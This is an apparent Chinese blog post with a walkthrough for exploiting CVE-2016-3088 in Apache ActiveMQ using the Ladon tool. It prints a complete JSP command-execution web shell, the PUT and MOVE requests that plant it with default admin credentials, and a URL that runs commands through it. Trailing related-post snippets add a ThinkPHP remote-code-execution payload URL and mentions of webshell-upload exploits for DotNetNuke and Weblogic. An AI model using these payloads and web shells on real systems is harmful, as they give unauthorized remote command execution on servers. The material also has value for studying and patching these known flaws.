Ladon插件CVE-2016-3088 ActiveMQ GetShell Exploit

前言

使用Exp生成器生成Ladon插件实战,CVE-2016-3088 ActiveMQ GetShell

0x000 漏洞信息

漏洞编号: CVE-2016-3088

漏洞原理: ActiveMQ 中的 FileServer 服务允许用户通过 PUT/MOVE方法上传文件到指定目录

影响版本: Apache ActiveMQ 5.0.0 – 5.13.2

0x001 获取路径

PUT /fileserver/%20/%20

0x002 上传shell

上传和移动文件需登陆,默认帐密admin/admin,将以下代码双引号进行转义(原本是转义好的被github过滤了)

PUT

AddUrl: /fileserver/cmd.jsp

PUTData: <%@ page import="java.io.*"%><%out.print("Hello");String strcmd = request.getParameter("cmd");String line =null;Process p=Runtime.getRuntime().exec(strcmd);InputStream is = p.getInputStream();BufferedReader br = new BufferedReader(new InputStreamReader(is));while((line =br.readLine())!=null){out.print(line+"");}%>

Authorization: admin:admin

0x003 移动shell

根目录和fileserver均不解析JSP文件,好在admin和api目录可以解析

MOVE

AddUrl: /fileserver/cmd.jsp

Destination: file://C:/Users/null/Desktop/apache-activemq-5.9.0/webapps/admin/cmd.jsp

0x004 Cscan调用

0x005 连接shell

访问http://192.168.1.26:8161/admin/shell.jsp?cmd=whoami

0x006 视频教程

Video1: K8Cscan Apache ActiveMQ GetShell CVE-2016-3088

Video2: WhatCMS指纹识别内网ActiveMQ&GetShell

原文地址:https://www.cnblogs.com/k8gege/p/12307455.html

时间: 2024-11-09 09:24:12

Ladon插件CVE-2016-3088 ActiveMQ GetShell Exploit的相关文章

Ladon插件ThinkPHP 5.0.22 5.1.29 GetShell Exploit

前言 使用Exp生成器生成Ladon插件实战,ThinkPHP GetShell 漏洞环境 使用docker ThinkPHP 5.0.20 复现测试 Payload: http://192.168.1.37:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1 执行命令 http://192.168.1.37:8080

[MSF] DotNetNuke DNNspot Store &lt;=3.0 GetShell exploit

MSF DotNetNuke DNNspot Store <=3.0 GetShell exploit  by k8team MSF里很多EXP都是反弹shell的 用起来不方便1 没exe执行权限时 有些东西就蛋碎了2 是大部分人都没VPS,你弹到哪去啊所以我弄了个直接上传webshell的脚本 DNNspot_upload_aspx.rb # Exploit Title: DotNetNuke DNNspot Store <=3.0 GetShell exploit# Date: 31/0

[EXP]K8 DotNetNuke DNNspot Store &lt;=3.0 GetShell exploit

# Exploit Title: DotNetNuke DNNspot Store <=3.0 GetShell exploit# Date: 31/03/2015# Author: K8拉登哥哥# Version: 3.0.0# Vendor: DNNspot# Vendor URL: https://www.dnnspot.com# Google Dork: inurl:/DesktopModules/DNNspot-Store/##msf > use exploit/windows/ht

Ladon插件实战 Weblogic CVE-2018-2894

前言 使用Exp生成器生成Ladon插件实战,Weblogic CVE-2018-2894漏洞检测 漏洞扫描 Weblogic CVE-2018-2894 github上有一份weblogic一键检测脚本,发现存在漏洞误报 看了下代码竟只是判断页面非404,对于返回403,500等误报 还不如写成200,虽然同样不靠谱,于是Ladon添加此POC检测 误报的POC检测脚本 存在漏洞的页面特征 EXP生成器生成POC 使用EXP生成器可简单检测,至少判断页面特征比单纯检测状态更好吧 POC测试 L

ActiveMQ的安全机制使用及其源代码分析 [转]

ActiveMQ是目前较为流行的一款开源消息服务器.最近在项目开发中,需要为ActiveMQ开发基于IP的验证和授权机制,因此,对ActiveMQ的安全机制进行了了解,以下将介绍ActiveMQ的安全机制使用及其源代码分析. 本文开发环境介绍: 操作系统:Windows XP Java:jdk 1.6.0_12 maven:maven 3.0.4 ActiveMQ:ActiveMQ 5.6.0 ActiveMQ安全机制的介绍 安 全机制一般包含验证(Authentication)和授权(Auth

jQuery及HTML5 插件的使用计划列单

1.基于CSS3和HTML5的 图片上传插件的使用及感受 Hupload   2015/12/5  类似链接http://www.htmleaf.com/Demo/201505091802.html 2.JQuery 图片的裁剪插件 copper.js  2015/12/6           加入添加编辑(网络)图片功能,主要需解决服务器跨域问题 3.jQUery树插件 zTree  2016  http://www.ztree.me/v3/main.php#_zTreeInfo 4.kind

使用 Raspberry Pi 上的传感器在 Node.js 中创建一个 IoT Bluemix 应用程序

先决条件 一个IBM Bluemix 帐号,一个 Raspberry Pi 2 或 3,一个 PIR 运动传感器 适用于本文的 Github 存储库 如果您是一位精明的 Bluemix 开发人员,您可能只想看看如何在 node.js 中与 IoT 建立连接,或者只想了解如何从此 github 存储库中拉取我的代码. git clone https://github.com/nicolefinnie/iot-nodejs-tutorial 以下是实现与 IBM IoT 平台连接在一起的 4 个 R

backtrack中web测试工具

Backtrack 5中Web应用程序风险评估工具使用(Joomscan BlindElephant CMS-Explorer whatweb Plecost WPScan) 2013-03-02 04:03:51|  分类: 工具收集 |  标签:joomscan  blindelephant  whatweb  plecost  wpscan  |举报|字号 订阅 本文将介绍Backtrack 5中web应用程序风险评估模块下的部分工具的详细介绍和使用,包括工具的功能特点,使用方法等.希望对

用Spring发送和接受JMS消息的一个小例子

Spring提供的JmsTemplate对原生的JMS API进行了一层薄薄的封装,使用起来非常的方便. 我使用的JMS消息代理插件是Apache的ActiveMQ,建议安装最新版本,因为我之前安装老版本,各种不兼容,各种bug,最新版的activemq-all-5.9.1.jar包里面已经有了slf4j.impl包,之前就是被这个坑了...把这个jar包加到lib目录下面,就不会有各种ClassNotFound异常和类冲突的bug了. 下载ActiveMQ解压之后运行bin下面的activem